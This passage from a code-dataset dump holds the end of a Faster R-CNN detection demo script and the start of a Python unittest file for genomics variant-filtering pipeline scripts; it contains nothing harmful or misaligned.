parser.add_argument('--checkepoch', dest='checkepoch',\n help='checkepoch to load network',\n default=1, type=int)\n parser.add_argument('--checkpoint', dest='checkpoint',\n help='checkpoint to load network',\n default=10021, type=int)\n parser.add_argument('--bs', dest='batch_size',\n help='batch_size',\n default=1, type=int)\n parser.add_argument('--vis', dest='vis',\n help='visualization mode',\n action='store_true')\n parser.add_argument('--webcam_num', dest='webcam_num',\n help='webcam ID number',\n default=-1, type=int)\n\n args = parser.parse_args()\n return args\n\n\nlr = cfg.TRAIN.LEARNING_RATE\nmomentum = cfg.TRAIN.MOMENTUM\nweight_decay = cfg.TRAIN.WEIGHT_DECAY\n\n\ndef _get_image_blob(im):\n \"\"\"Converts an image into a network input.\n Arguments:\n im (ndarray): a color image in BGR order\n Returns:\n blob (ndarray): a data blob holding an image pyramid\n im_scale_factors (list): list of image scales (relative to im) used\n in the image pyramid\n \"\"\"\n im_orig = im.astype(np.float32, copy=True)\n im_orig -= cfg.PIXEL_MEANS\n\n im_shape = im_orig.shape\n im_size_min = np.min(im_shape[0:2])\n im_size_max = np.max(im_shape[0:2])\n\n processed_ims = []\n im_scale_factors = []\n\n for target_size in cfg.TEST.SCALES:\n im_scale = float(target_size) / float(im_size_min)\n # Prevent the biggest axis from being more than MAX_SIZE\n if np.round(im_scale * im_size_max) > cfg.TEST.MAX_SIZE:\n im_scale = float(cfg.TEST.MAX_SIZE) / float(im_size_max)\n im = cv2.resize(im_orig, None, None, fx=im_scale, fy=im_scale,\n interpolation=cv2.INTER_LINEAR)\n im_scale_factors.append(im_scale)\n processed_ims.append(im)\n\n # Create a blob to hold the input images\n blob = im_list_to_blob(processed_ims)\n\n return blob, np.array(im_scale_factors)\n\n\nif __name__ == '__main__':\n\n args = parse_args()\n\n print('Called with args:')\n print(args)\n\n if args.cfg_file is not None:\n cfg_from_file(args.cfg_file)\n if args.set_cfgs is not None:\n cfg_from_list(args.set_cfgs)\n\n cfg.USE_GPU_NMS = args.cuda\n\n print('Using config:')\n pprint.pprint(cfg)\n np.random.seed(cfg.RNG_SEED)\n\n # train set\n # -- Note: Use validation set and disable the flipped to enable faster loading.\n\n input_dir = args.load_dir + \"/\" + args.net + \"/\" + args.dataset\n if not os.path.exists(input_dir):\n raise Exception(\n 'There is no input directory for loading network from ' + input_dir)\n load_name = os.path.join(input_dir,\n 'faster_rcnn_{}_{}_{}.pth'.format(args.checksession, args.checkepoch, args.checkpoint))\n\n #pascal_classes = np.asarray(get_categories(\"EconomicBeeHoon_train\"))\n pascal_classes = get_categories('All_train_mt10')\n\n # initilize the network here.\n if args.net == 'vgg16':\n fasterRCNN = vgg16(pascal_classes, pretrained=False,\n class_agnostic=args.class_agnostic)\n elif args.net == 'res101':\n fasterRCNN = resnet(pascal_classes, 101, pretrained=False,\n class_agnostic=args.class_agnostic)\n elif args.net == 'res50':\n fasterRCNN = resnet(pascal_classes, 50, pretrained=False,\n class_agnostic=args.class_agnostic)\n elif args.net == 'res152':\n fasterRCNN = resnet(pascal_classes, 152, pretrained=False,\n class_agnostic=args.class_agnostic)\n elif args.net == 'foodres50':\n fasterRCNN = PreResNet50(pascal_classes, pretrained=False,\n class_agnostic=args.class_agnostic)\n else:\n print(\"network is not defined\")\n pdb.set_trace()\n\n fasterRCNN.create_architecture()\n\n print(\"load checkpoint %s\" % (load_name))\n if args.cuda > 0:\n checkpoint = torch.load(load_name)\n else:\n checkpoint = 
torch.load(\n load_name, map_location=(lambda storage, loc: storage))\n fasterRCNN.load_state_dict(checkpoint['model'])\n if 'pooling_mode' in checkpoint.keys():\n cfg.POOLING_MODE = checkpoint['pooling_mode']\n\n print('load model successfully!')\n\n # pdb.set_trace()\n\n print(\"load checkpoint %s\" % (load_name))\n\n # initilize the tensor holder here.\n im_data = torch.FloatTensor(1)\n im_info = torch.FloatTensor(1)\n num_boxes = torch.LongTensor(1)\n gt_boxes = torch.FloatTensor(1)\n\n # ship to cuda\n if args.cuda > 0:\n im_data = im_data.cuda()\n im_info = im_info.cuda()\n num_boxes = num_boxes.cuda()\n gt_boxes = gt_boxes.cuda()\n\n # make variable\n im_data = Variable(im_data, volatile=True)\n im_info = Variable(im_info, volatile=True)\n num_boxes = Variable(num_boxes, volatile=True)\n gt_boxes = Variable(gt_boxes, volatile=True)\n\n if args.cuda > 0:\n cfg.CUDA = True\n\n if args.cuda > 0:\n fasterRCNN.cuda()\n\n fasterRCNN.eval()\n\n start = time.time()\n max_per_image = 100\n thresh = 0.05\n vis = True\n\n webcam_num = args.webcam_num\n # Set up webcam or get image directories\n if webcam_num >= 0:\n cap = cv2.VideoCapture(webcam_num)\n num_images = 0\n else:\n imglist = os.listdir(args.image_dir)\n num_images = len(imglist)\n\n print('Loaded Photo: {} images.'.format(num_images))\n\n while (num_images >= 0):\n total_tic = time.time()\n if webcam_num < 0:\n num_images -= 1\n\n # Get image from the webcam\n if webcam_num >= 0:\n if not cap.isOpened():\n raise RuntimeError(\n \"Webcam could not open. Please check connection.\")\n ret, frame = cap.read()\n im_in = np.array(frame)\n # Load the demo image\n else:\n im_file = os.path.join(args.image_dir, imglist[num_images])\n # im = cv2.imread(im_file)\n im_in = np.array(imread(im_file))\n if len(im_in.shape) == 2:\n im_in = im_in[:, :, np.newaxis]\n im_in = np.concatenate((im_in, im_in, im_in), axis=2)\n # rgb -> bgr\n im = im_in[:, :, ::-1]\n\n blobs, im_scales = _get_image_blob(im)\n assert len(im_scales) == 1, \"Only single-image batch implemented\"\n im_blob = blobs\n im_info_np = np.array(\n [[im_blob.shape[1], im_blob.shape[2], im_scales[0]]], dtype=np.float32)\n\n im_data_pt = torch.from_numpy(im_blob)\n im_data_pt = im_data_pt.permute(0, 3, 1, 2)\n im_info_pt = torch.from_numpy(im_info_np)\n\n im_data.data.resize_(im_data_pt.size()).copy_(im_data_pt)\n im_info.data.resize_(im_info_pt.size()).copy_(im_info_pt)\n gt_boxes.data.resize_(1, 1, 5).zero_()\n num_boxes.data.resize_(1).zero_()\n\n # pdb.set_trace()\n det_tic = time.time()\n\n rois, cls_prob, bbox_pred, \\\n rpn_loss_cls, rpn_loss_box, \\\n RCNN_loss_cls, RCNN_loss_bbox, \\\n rois_label = fasterRCNN(im_data, im_info, gt_boxes, num_boxes)\n\n scores = cls_prob.data\n boxes = rois.data[:, :, 1:5]\n\n if cfg.TEST.BBOX_REG:\n # Apply bounding-box regression deltas\n box_deltas = bbox_pred.data\n if cfg.TRAIN.BBOX_NORMALIZE_TARGETS_PRECOMPUTED:\n # Optionally normalize targets by a precomputed mean and stdev\n if args.class_agnostic:\n if args.cuda > 0:\n box_deltas = box_deltas.view(-1, 4) * torch.FloatTensor(cfg.TRAIN.BBOX_NORMALIZE_STDS).cuda() \\\n + torch.FloatTensor(cfg.TRAIN.BBOX_NORMALIZE_MEANS).cuda()\n else:\n box_deltas = box_deltas.view(-1, 4) * torch.FloatTensor(cfg.TRAIN.BBOX_NORMALIZE_STDS) \\\n + torch.FloatTensor(cfg.TRAIN.BBOX_NORMALIZE_MEANS)\n\n box_deltas = box_deltas.view(1, -1, 4)\n else:\n if args.cuda > 0:\n box_deltas = box_deltas.view(-1, 4) * torch.FloatTensor(cfg.TRAIN.BBOX_NORMALIZE_STDS).cuda() \\\n + 
torch.FloatTensor(cfg.TRAIN.BBOX_NORMALIZE_MEANS).cuda()\n else:\n box_deltas = box_deltas.view(-1, 4) * torch.FloatTensor(cfg.TRAIN.BBOX_NORMALIZE_STDS) \\\n + torch.FloatTensor(cfg.TRAIN.BBOX_NORMALIZE_MEANS)\n box_deltas = box_deltas.view(\n 1, -1, 4 * len(pascal_classes))\n\n pred_boxes = bbox_transform_inv(boxes, box_deltas, 1)\n pred_boxes = clip_boxes(pred_boxes, im_info.data, 1)\n else:\n # Simply repeat the boxes, once for each class\n pred_boxes = np.tile(boxes, (1, scores.shape[1]))\n\n pred_boxes /= im_scales[0]\n\n scores = scores.squeeze()\n pred_boxes = pred_boxes.squeeze()\n det_toc = time.time()\n detect_time = det_toc - det_tic\n misc_tic = time.time()\n\n # get gt\n # 1. read xml\n\n\n\n\n if vis:\n im2show = np.copy(im)\n for j in xrange(1, len(pascal_classes)):\n inds = torch.nonzero(scores[:, j] > thresh).view(-1)\n # if there is det\n if inds.numel() > 0:\n cls_scores = scores[:, j][inds]\n _, order = torch.sort(cls_scores, 0, True)\n if args.class_agnostic:\n cls_boxes = pred_boxes[inds, :]\n else:\n cls_boxes = pred_boxes[inds][:, j * 4:(j + 1) * 4]\n\n cls_dets = torch.cat((cls_boxes, cls_scores.unsqueeze(1)), 1)\n # cls_dets = torch.cat((cls_boxes, cls_scores), 1)\n cls_dets = cls_dets[order]\n keep = nms(cls_dets, cfg.TEST.NMS,\n force_cpu=not cfg.USE_GPU_NMS)\n cls_dets = cls_dets[keep.view(-1).long()]\n if vis:\n im2show = vis_detections(\n im2show, id2eng[pascal_classes[j]], cls_dets.cpu().numpy(), 0.5)\n\n misc_toc = time.time()\n nms_time = misc_toc - misc_tic\n\n if webcam_num == -1:\n sys.stdout.write('im_detect: {:d}/{:d} {:.3f}s {:.3f}s \\r'\n .format(num_images + 1, len(imglist), detect_time, nms_time))\n sys.stdout.flush()\n\n if vis and webcam_num == -1:\n # cv2.imshow('test', im2show)\n # cv2.waitKey(0)\n result_path = os.path.join(\n args.image_dir, imglist[num_images][:-4] + \"_det.jpg\")\n cv2.imwrite(result_path, im2show)\n else:\n #im2showRGB = cv2.cvtColor(im2show, cv2.COLOR_BGR2RGB)\n im2showRGB = im2show\n cv2.namedWindow(\"frame\", 0)\n cv2.resizeWindow(\"frame\", 800, 800)\n cv2.imshow(\"frame\", im2showRGB)\n total_toc = time.time()\n total_time = total_toc - total_tic\n frame_rate = 1 / total_time\n print('Frame rate:', frame_rate)\n if cv2.waitKey(5000) & 0xFF == ord('q'):\n break\n if webcam_num >= 0:\n cap.release()\n cv2.destroyAllWindows()\n"} {"ext": "py", "sha": "1a31482ab1b64d2f5e340b0b5127bb2b142fc900", "content": "\n__author__ = \"Timothy Tickle\"\n__copyright__ = \"Copyright 2015\"\n__credits__ = [ \"Timothy Tickle\", \"Brian Haas\" ]\n__license__ = \"MIT\"\n__maintainer__ = \"Timothy Tickle\"\n__email__ = \"ttickle@broadinstitute.org\"\n__status__ = \"Development\"\n\nimport Commandline\nimport os\nimport ParentPipelineTester\nimport unittest\n\nclass ScriptTester( ParentPipelineTester.ParentPipelineTester ):\n \"\"\"\n Testing for scripts, starting at command line.\n \"\"\"\n str_script_dir = \"src\"\n str_test_data_dir = \"test_data\"\n str_test_data_dir_working = os.path.join( str_test_data_dir, \"active_testing_script_tester\" )\n\n# combine_vchk.py\n def test_combine_vchk_for_1_file( self ):\n \"\"\"\n Test combining VCHK files when only one is given\n \"\"\"\n # Create test environment\n str_combine_script = os.path.join( self.str_script_dir, \"combine_vchk.py\" )\n str_vchk_dir = os.path.join( self.str_test_data_dir, \"test_combine_vchk_for_1_file\" )\n str_output_dir = os.path.join( self.str_test_data_dir_working, \"test_combine_vchk_for_1_file\" )\n str_substitutions_dis_json = os.path.join( self.str_test_data_dir, 
\"test_combine_vchk_1_distributions_substitutions_ANSWER.json\" )\n str_substitutions_dis_json_test = os.path.join( str_output_dir, \"Distributions_substitutions.json\" )\n str_substitutions_dis_pdf_test = os.path.join( str_output_dir, \"Distributions_substitutions.pdf\" )\n str_substitions_total_json = os.path.join( self.str_test_data_dir, \"test_combine_vchk_for_1_total_substitutions_ANSWER.json\" )\n str_substitions_total_json_test = os.path.join( str_output_dir, \"Total_substitutions.json\" )\n str_substitions_total_pdf_test = os.path.join( str_output_dir, \"Total_substitutions.pdf\" )\n self.func_make_dummy_dir( self.str_test_data_dir_working )\n self.func_make_dummy_dir( str_output_dir )\n # Call Example script\n str_command = \" \".join( [ str_combine_script, \"--input_dir\", str_vchk_dir, \"--output_dir\", str_output_dir ] )\n Commandline.Commandline().func_CMD( str_command )\n # Check test environment for results\n f_success = self.func_are_files_equivalent( str_substitutions_dis_json, str_substitutions_dis_json_test )\n f_success = f_success and self.func_are_files_equivalent( str_substitions_total_json, str_substitions_total_json_test )\n # Destroy environment\n self.func_remove_files( [ str_substitutions_dis_json_test, str_substitions_total_json_test ] )\n self.func_remove_files( [ str_substitutions_dis_pdf_test, str_substitions_total_pdf_test ] )\n self.func_remove_dirs( [ str_output_dir ] )\n # Evaluate\n self.func_test_true( f_success )\n\n def test_combine_vchk_for_2_file( self ):\n \"\"\"\n Test combining VCHK files when two are given\n \"\"\"\n # Create test environment\n str_combine_script = os.path.join( self.str_script_dir, \"combine_vchk.py\" )\n str_vchk_dir = os.path.join( self.str_test_data_dir, \"test_combine_vchk_for_2_file\" )\n str_output_dir = os.path.join( self.str_test_data_dir_working, \"test_combine_vchk_for_2_file\" )\n str_substitutions_dis_json = os.path.join( self.str_test_data_dir, \"test_combine_vchk_2_distributions_substitutions_ANSWER.json\" )\n str_substitutions_dis_json_test = os.path.join( str_output_dir, \"Distributions_substitutions.json\" )\n str_substitutions_dis_pdf_test = os.path.join( str_output_dir, \"Distributions_substitutions.pdf\" )\n str_substitions_total_json = os.path.join( self.str_test_data_dir, \"test_combine_vchk_for_2_total_substitutions_ANSWER.json\" )\n str_substitions_total_json_test = os.path.join( str_output_dir, \"Total_substitutions.json\" )\n str_substitions_total_pdf_test = os.path.join( str_output_dir, \"Total_substitutions.pdf\" )\n self.func_make_dummy_dir( self.str_test_data_dir_working )\n self.func_make_dummy_dir( str_output_dir )\n # Call Example script\n str_command = \" \".join( [ str_combine_script, \"--input_dir\", str_vchk_dir, \"--output_dir\", str_output_dir ] )\n Commandline.Commandline().func_CMD( str_command )\n # Check test environment for results\n f_success = self.func_are_files_equivalent( str_substitutions_dis_json, str_substitutions_dis_json_test )\n f_success = f_success and self.func_are_files_equivalent( str_substitions_total_json, str_substitions_total_json_test )\n # Destroy environment\n self.func_remove_files( [ str_substitutions_dis_json_test, str_substitions_total_json_test ] )\n self.func_remove_files( [ str_substitutions_dis_pdf_test, str_substitions_total_pdf_test ] )\n self.func_remove_dirs( [ str_output_dir ] )\n # Evaluate\n self.func_test_true( f_success )\n\n def test_combine_vchk_for_3_file( self ):\n \"\"\"\n Test combining VCHK files when three are given\n \"\"\"\n # Create 
test environment\n str_combine_script = os.path.join( self.str_script_dir, \"combine_vchk.py\" )\n str_vchk_dir = os.path.join( self.str_test_data_dir, \"test_combine_vchk_for_3_file\" )\n str_output_dir = os.path.join( self.str_test_data_dir_working, \"test_combine_vchk_for_3_file\" )\n str_substitutions_dis_json = os.path.join( self.str_test_data_dir, \"test_combine_vchk_3_distributions_substitutions_ANSWER.json\" )\n str_substitutions_dis_json_test = os.path.join( str_output_dir, \"Distributions_substitutions.json\" )\n str_substitutions_dis_pdf_test = os.path.join( str_output_dir, \"Distributions_substitutions.pdf\" )\n str_substitions_total_json = os.path.join( self.str_test_data_dir, \"test_combine_vchk_for_3_total_substitutions_ANSWER.json\" )\n str_substitions_total_json_test = os.path.join( str_output_dir, \"Total_substitutions.json\" )\n str_substitions_total_pdf_test = os.path.join( str_output_dir, \"Total_substitutions.pdf\" )\n self.func_make_dummy_dir( self.str_test_data_dir_working )\n self.func_make_dummy_dir( str_output_dir )\n # Call Example script\n str_command = \" \".join( [ str_combine_script, \"--input_dir\", str_vchk_dir, \"--output_dir\", str_output_dir ] )\n Commandline.Commandline().func_CMD( str_command )\n # Check test environment for results\n f_success = self.func_are_files_equivalent( str_substitutions_dis_json, str_substitutions_dis_json_test )\n f_success = f_success and self.func_are_files_equivalent( str_substitions_total_json, str_substitions_total_json_test )\n # Destroy environment\n self.func_remove_files( [ str_substitutions_dis_json_test, str_substitions_total_json_test ] )\n self.func_remove_files( [ str_substitutions_dis_pdf_test, str_substitions_total_pdf_test ] )\n self.func_remove_dirs( [ str_output_dir ] )\n # Evaluate\n self.func_test_true( f_success )\n\n# comfirm_maf_mutations.py\n# filter_snps_rna_editing.py\n def test_filter_snps_rna_editing_no_resources( self ):\n \"\"\"\n Test filter_snps_rna_editing with data no resources for filtering\n \"\"\"\n # Create test environment\n str_filter_script = os.path.join( self.str_script_dir, \"filter_snps_rna_editing.py\" )\n str_test_file = os.path.join( self.str_test_data_dir, \"test_filter_snps_rna_editing_no_resources.vcf\" )\n str_answer_file = os.path.join( self.str_test_data_dir, \"test_filter_snps_rna_editing_no_resources_ANSWER.vcf\" )\n str_result_file = os.path.join( self.str_test_data_dir_working, \"test_filter_snps_rna_editing_no_resources.vcf\" )\n self.func_make_dummy_dir( self.str_test_data_dir_working )\n self.func_make_dummy_dir( self.str_test_data_dir )\n # Call Example script\n str_command = \" \".join( [ str_filter_script, str_test_file, str_result_file ] )\n Commandline.Commandline().func_CMD( str_command )\n # Check test environment for results\n f_success = self.func_are_files_equivalent( str_answer_file, str_result_file )\n # Destroy environment\n #self.func_remove_files( [ str_result_file ] )\n # Evaluate\n self.func_test_true( f_success )\n\n def test_filter_snps_rna_editing_with_darned( self ):\n \"\"\"\n Test filter_snps_rna_editing with data darned resources for filtering\n \"\"\"\n # Create test environment\n str_filter_script = os.path.join( self.str_script_dir, \"filter_snps_rna_editing.py\" )\n str_test_file = os.path.join( self.str_test_data_dir, \"test_filter_snps_rna_editing_darned.vcf\" )\n str_darned_file = os.path.join( self.str_test_data_dir, \"test_filter_snps_rna_editing_darned.tab\" )\n str_answer_file = os.path.join( self.str_test_data_dir, 
\"test_filter_snps_rna_editing_darned_ANSWER.vcf\" )\n str_result_file = os.path.join( self.str_test_data_dir_working, \"test_filter_snps_rna_editing_darned.vcf\" )\n self.func_make_dummy_dir( self.str_test_data_dir_working )\n self.func_make_dummy_dir( self.str_test_data_dir )\n # Call Example script\n str_command = \" \".join( [ str_filter_script, \"--darned\", str_darned_file, str_test_file, str_result_file ] )\n Commandline.Commandline().func_CMD( str_command )\n # Check test environment for results\n f_success = self.func_are_files_equivalent( str_answer_file, str_result_file )\n # Destroy environment\n #self.func_remove_files( [ str_result_file ] )\n # Evaluate\n self.func_test_true( f_success )\n\n def test_filter_snps_rna_editing_with_radar( self ):\n \"\"\"\n Test filter_snps_rna_editing with data radar resources for filtering\n \"\"\"\n # Create test environment\n str_filter_script = os.path.join( self.str_script_dir, \"filter_snps_rna_editing.py\" )\n str_test_file = os.path.join( self.str_test_data_dir, \"test_filter_snps_rna_editing_radar.vcf\" )\n str_radar_file = os.path.join( self.str_test_data_dir, \"test_filter_snps_rna_editing_radar.tab\" )\n str_answer_file = os.path.join( self.str_test_data_dir, \"test_filter_snps_rna_editing_radar_ANSWER.vcf\" )\n str_result_file = os.path.join( self.str_test_data_dir_working, \"test_filter_snps_rna_editing_radar.vcf\" )\n self.func_make_dummy_dir( self.str_test_data_dir_working )\n self.func_make_dummy_dir( self.str_test_data_dir )\n # Call Example script\n str_command = \" \".join( [ str_filter_script, \"--radar\", str_radar_file, str_test_file, str_result_file ] )\n Commandline.Commandline().func_CMD( str_command )\n # Check test environment for results\n f_success = self.func_are_files_equivalent( str_answer_file, str_result_file )\n # Destroy environment\n #self.func_remove_files( [ str_result_file ] )\n # Evaluate\n self.func_test_true( f_success )\n\n def test_filter_snps_rna_editing_with_darned_radar( self ):\n \"\"\"\n Test filter_snps_rna_editing with darned and radar data resources for filtering\n \"\"\"\n # Create test environment\n str_filter_script = os.path.join( self.str_script_dir, \"filter_snps_rna_editing.py\" )\n str_test_file = os.path.join( self.str_test_data_dir, \"test_filter_snps_rna_editing_radar_darned.vcf\" )\n str_radar_file = os.path.join( self.str_test_data_dir, \"test_filter_snps_rna_editing_radar.tab\" )\n str_darned_file = os.path.join( self.str_test_data_dir, \"test_filter_snps_rna_editing_darned.tab\" )\n str_answer_file = os.path.join( self.str_test_data_dir, \"test_filter_snps_rna_editing_radar_darned_ANSWER.vcf\" )\n str_result_file = os.path.join( self.str_test_data_dir_working, \"test_filter_snps_rna_editing_radar_darned.vcf\" )\n self.func_make_dummy_dir( self.str_test_data_dir_working )\n self.func_make_dummy_dir( self.str_test_data_dir )\n # Call Example script\n str_command = \" \".join( [ str_filter_script, \"--radar\", str_radar_file, \"--darned\", str_darned_file, str_test_file, str_result_file ] )\n Commandline.Commandline().func_CMD( str_command )\n # Check test environment for results\n f_success = self.func_are_files_equivalent( str_answer_file, str_result_file )\n # Destroy environment\n #self.func_remove_files( [ str_result_file ] )\n # Evaluate\n self.func_test_true( f_success )\n\n# filter_variant_clusters.py\n def test_filter_clusters_for_no_filtering( self ):\n \"\"\"\n Test filter_variant_cluster with data that does not need filtering\n \"\"\"\n # Create test environment\n 
str_filter_script = os.path.join( self.str_script_dir, \"filter_variant_clusters.py\" )\n str_output_dir = os.path.join( self.str_test_data_dir_working, \"test_filter_clusters\" )\n str_test_file = os.path.join( self.str_test_data_dir, \"test_filter_clusters.vcf\" )\n str_answer_file = os.path.join( self.str_test_data_dir, \"test_filter_clusters_for_no_filtering_ANSWER.vcf\" )\n str_result_file = os.path.join( str_output_dir, \"test_filter_clusters_for_no_filtering.vcf\" )\n self.func_make_dummy_dir( self.str_test_data_dir_working )\n self.func_make_dummy_dir( self.str_test_data_dir )\n self.func_make_dummy_dir( str_output_dir )\n # Call Example script\n str_command = \" \".join( [ str_filter_script, \"--window\", \"35\", \"--cluster\", \"34\", str_test_file, str_result_file ] )\n Commandline.Commandline().func_CMD( str_command )\n # Check test environment for results\n f_success = self.func_are_files_equivalent( str_test_file, str_result_file )\n # Destroy environment\n self.func_remove_files( [ str_result_file ] )\n self.func_remove_dirs( [ str_output_dir ] )\n # Evaluate\n self.func_test_true( f_success )\n\n def test_filter_clusters_for_all_filtering( self ):\n \"\"\"\n Test filter_variant_cluster with data that will be completely filtered\n \"\"\"\n # Create test environment\n str_filter_script = os.path.join( self.str_script_dir, \"filter_variant_clusters.py\" )\n str_output_dir = os.path.join( self.str_test_data_dir_working, \"test_filter_clusters\" )\n str_test_file = os.path.join( self.str_test_data_dir, \"test_filter_clusters.vcf\" )\n str_answer_file = os.path.join( self.str_test_data_dir, \"test_filter_clusters_for_all_filtering_ANSWER.vcf\" )\n str_result_file = os.path.join( str_output_dir, \"test_filter_clusters_for_all_filtering.vcf\" )\n self.func_make_dummy_dir( self.str_test_data_dir_working )\n self.func_make_dummy_dir( self.str_test_data_dir )\n self.func_make_dummy_dir( str_output_dir )\n # Call Example script\n str_command = \" \".join( [ str_filter_script, \"--window\", \"1\", \"--cluster\", \"1\", str_test_file, str_result_file ] )\n Commandline.Commandline().func_CMD( str_command )\n # Check test environment for results\n f_success = self.func_are_files_equivalent( str_answer_file, str_result_file )\n # Destroy environment\n self.func_remove_files( [ str_result_file ] )\n self.func_remove_dirs( [ str_output_dir ] )\n # Evaluate\n self.func_test_true( f_success )\n\n def test_filter_clusters_for_mild_filtering( self ):\n \"\"\"\n Test filter_variant_cluster with mild filtering\n \"\"\"\n # Create test environment\n str_filter_script = os.path.join( self.str_script_dir, \"filter_variant_clusters.py\" )\n str_output_dir = os.path.join( self.str_test_data_dir_working, \"test_filter_clusters\" )\n str_test_file = os.path.join( self.str_test_data_dir, \"test_filter_clusters.vcf\" )\n str_answer_file = os.path.join( self.str_test_data_dir, \"test_filter_clusters_for_mild_filtering_ANSWER.vcf\" )\n str_result_file = os.path.join( str_output_dir, \"test_filter_clusters_for_mild_filtering.vcf\" )\n self.func_make_dummy_dir( self.str_test_data_dir_working )\n self.func_make_dummy_dir( self.str_test_data_dir )\n self.func_make_dummy_dir( str_output_dir )\n # Call Example script\n str_command = \" \".join( [ str_filter_script, \"--window\", \"35\", \"--cluster\", \"2\", str_test_file, str_result_file ] )\n Commandline.Commandline().func_CMD( str_command )\n # Check test environment for results\n f_success = self.func_are_files_equivalent( str_answer_file, str_result_file )\n # 
Destroy environment\n self.func_remove_files( [ str_result_file ] )\n self.func_remove_dirs( [ str_output_dir ] )\n # Evaluate\n self.func_test_true( f_success )\n\n# filter_vcf_for_cancer.py\n def test_filter_vcf_for_cancer_for_COMMON_filtering( self ):\n \"\"\"\n Test filter_vcf_for_cancer for COMMON features.\n \"\"\"\n # Create test environment\n str_filter_cancer_script = os.path.join( self.str_script_dir, \"filter_vcf_for_cancer.py\" )\n str_test_file = os.path.join( self.str_test_data_dir, \"test_filter_vcf_for_cancer_COMMON.vcf\" )\n str_answer_file = os.path.join( self.str_test_data_dir, \"test_filter_vcf_for_cancer_COMMON_ANSWER.vcf\" )\n str_result_file = os.path.join( self.str_test_data_dir_working, \"test_filter_for_cancer_COMMON.vcf\" )\n self.func_make_dummy_dir( self.str_test_data_dir_working )\n self.func_make_dummy_dir( self.str_test_data_dir )\n # Call Example script\n str_command = \" \".join( [ str_filter_cancer_script, str_test_file, str_result_file ] )\n Commandline.Commandline().func_CMD( str_command )\n # Check test environment for results\n f_success = self.func_are_files_equivalent( str_answer_file, str_result_file )\n # Destroy environment\n self.func_remove_files( [ str_result_file ] )\n # Evaluate\n self.func_test_true( f_success )\n\n def test_filter_vcf_for_cancer_for_DP_filtering( self ):\n \"\"\"\n Test filter_vcf_for_cancer for DP features.\n \"\"\"\n # Create test environment\n str_filter_cancer_script = os.path.join( self.str_script_dir, \"filter_vcf_for_cancer.py\" )\n str_test_file = os.path.join( self.str_test_data_dir, \"test_filter_vcf_for_cancer_DP.vcf\" )\n str_answer_file = os.path.join( self.str_test_data_dir, \"test_filter_vcf_for_cancer_DP_ANSWER.vcf\" )\n str_result_file = os.path.join( self.str_test_data_dir_working, \"test_filter_for_cancer_DP.vcf\" )\n self.func_make_dummy_dir( self.str_test_data_dir_working )\n self.func_make_dummy_dir( self.str_test_data_dir )\n # Call Example script\n str_command = \" \".join( [ str_filter_cancer_script, str_test_file, str_result_file ] )\n Commandline.Commandline().func_CMD( str_command )\n # Check test environment for results\n f_success = self.func_are_files_equivalent( str_answer_file, str_result_file )\n # Destroy environment\n self.func_remove_files( [ str_result_file ] )\n # Evaluate\n self.func_test_true( f_success )\n\n def test_filter_vcf_for_cancer_for_SAO_filtering( self ):\n \"\"\"\n Test filter_vcf_for_cancer for SAO features.\n \"\"\"\n # Create test environment\n str_filter_cancer_script = os.path.join( self.str_script_dir, \"filter_vcf_for_cancer.py\" )\n str_test_file = os.path.join( self.str_test_data_dir, \"test_filter_vcf_for_cancer_SAO.vcf\" )\n str_answer_file = os.path.join( self.str_test_data_dir, \"test_filter_vcf_for_cancer_SAO_ANSWER.vcf\" )\n str_result_file = os.path.join( self.str_test_data_dir_working, \"test_filter_for_cancer_SAO.vcf\" )\n self.func_make_dummy_dir( self.str_test_data_dir_working )\n self.func_make_dummy_dir( self.str_test_data_dir )\n # Call Example script\n str_command = \" \".join( [ str_filter_cancer_script, str_test_file, str_result_file ] )\n Commandline.Commandline().func_CMD( str_command )\n # Check test environment for results\n f_success = self.func_are_files_equivalent( str_answer_file, str_result_file )\n # Destroy environment\n self.func_remove_files( [ str_result_file ] )\n # Evaluate\n self.func_test_true( f_success )\n\n def test_filter_vcf_for_cancer_for_FATHMM_filtering( self ):\n \"\"\"\n Test filter_vcf_for_cancer for FATHMM 
features.\n \"\"\"\n # Create test environment\n str_filter_cancer_script = os.path.join( self.str_script_dir, \"filter_vcf_for_cancer.py\" )\n str_test_file = os.path.join( self.str_test_data_dir, \"test_filter_vcf_for_cancer_FATHMM.vcf\" )\n str_answer_file = os.path.join( self.str_test_data_dir, \"test_filter_vcf_for_cancer_FATHMM_ANSWER.vcf\" )\n str_result_file = os.path.join( self.str_test_data_dir_working, \"test_filter_for_cancer_FATHMM.vcf\" )\n self.func_make_dummy_dir( self.str_test_data_dir_working )\n self.func_make_dummy_dir( self.str_test_data_dir )\n # Call Example script\n str_command = \" \".join( [ str_filter_cancer_script, str_test_file, str_result_file ] )\n Commandline.Commandline().func_CMD( str_command )\n # Check test environment for results\n f_success = self.func_are_files_equivalent( str_answer_file, str_result_file )\n # Destroy environment\n self.func_remove_files( [ str_result_file ] )\n # Evaluate\n self.func_test_true( f_success )\n\n def test_filter_vcf_for_cancer_for_ALL_filtering( self ):\n \"\"\"\n Test filter_vcf_for_cancer for ALL possible features.\n \"\"\"\n # Create test environment\n str_filter_cancer_script = os.path.join( self.str_script_dir, \"filter_vcf_for_cancer.py\" )\n str_test_file = os.path.join( self.str_test_data_dir, \"test_filter_vcf_for_cancer_ALL.vcf\" )\n str_answer_file = os.path.join( self.str_test_data_dir, \"test_filter_vcf_for_cancer_ALL_ANSWER.vcf\" )\n str_result_file = os.path.join( self.str_test_data_dir_working, \"test_filter_for_cancer_ALL.vcf\" )\n self.func_make_dummy_dir( self.str_test_data_dir_working )\n self.func_make_dummy_dir( self.str_test_data_dir )\n # Call Example script\n str_command = \" \".join( [ str_filter_cancer_script, str_test_file, str_result_file ] )\n Commandline.Commandline().func_CMD( str_command )\n # Check test environment for results\n f_success = self.func_are_files_equivalent( str_answer_file, str_result_file )\n # Destroy environment\n self.func_remove_files( [ str_result_file ] )\n # Evaluate\n self.func_test_true( f_success )\n\n# groom_cravat_annotation.py\n def test_groom_cravat_annotation_for_coding_variants_tab( self ):\n \"\"\"\n Test groom_cravat_annotation for a coding variants tab file.\n \"\"\"\n # Create test environment\n str_groom_script = os.path.join( self.str_script_dir, \"groom_cravat_annotation.py\" )\n str_test_file = os.path.join( self.str_test_data_dir, \"test_groom_cravat_annotations_coding.tab\" )\n str_answer_file = os.path.join( self.str_test_data_dir, \"test_groom_cravat_annotations_coding_ANSWER.tab\" )\n str_result_file = os.path.join( self.str_test_data_dir_working, \"test_groom_cravat_annotations_coding.tab\" )\n self.func_make_dummy_dir( self.str_test_data_dir_working )\n self.func_make_dummy_dir( self.str_test_data_dir )\n # Call Example script\n str_command = \" \".join( [ str_groom_script, str_test_file, str_result_file ] )\n Commandline.Commandline().func_CMD( 